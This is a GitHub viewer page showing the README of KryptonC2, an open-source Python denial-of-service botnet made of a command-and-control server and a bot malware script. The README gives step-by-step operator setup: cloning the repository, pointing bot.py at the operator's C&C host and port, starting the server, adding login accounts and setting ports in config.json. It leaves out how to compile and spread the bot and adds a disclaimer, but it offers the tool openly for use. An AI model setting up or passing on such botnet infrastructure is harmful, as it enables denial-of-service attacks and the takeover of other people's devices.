| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Name | Name | Last commit date | ||
|---|---|---|---|---|
KryptonC2 is a basic open source denial of service botnet system written in Python 3, consists of a connect and control server and a bot malware script.
Install Git and Python 3 on your server.
Clone the KryptonC2 Github repository to your server via Git: $ git clone https://github.com/CirqueiraDev/KryptonC2.
Change the host address and C&C port in the configuration section in bot.py to your server address and C&C port.
Install the requirements.txt
Start the C2 server by executing the command: $ python main.py.
Add accounts in logins.txt using the format: username:password:yyyy-mm-dd.
Configure the port on the config.json { "cnc_host": "0.0.0.0", "reg_host": "0.0.0.0", "cnc_port": 5511, "reg_port": 5512 }.
Connect to the server through PuTTY on a raw socket connection.
📍 Compiling the malware and installing it on vulnerable devices won't be told as it's highly illegal to get remote access to devices without permission. Use of this project for illegal activities is at own risk! I'm not responsible for any of your taken actions!
📌Source: https://github.com/NixWasHere/NixC2
KryptonC2 by:
| Back | FazBrowse Home | New Git URL |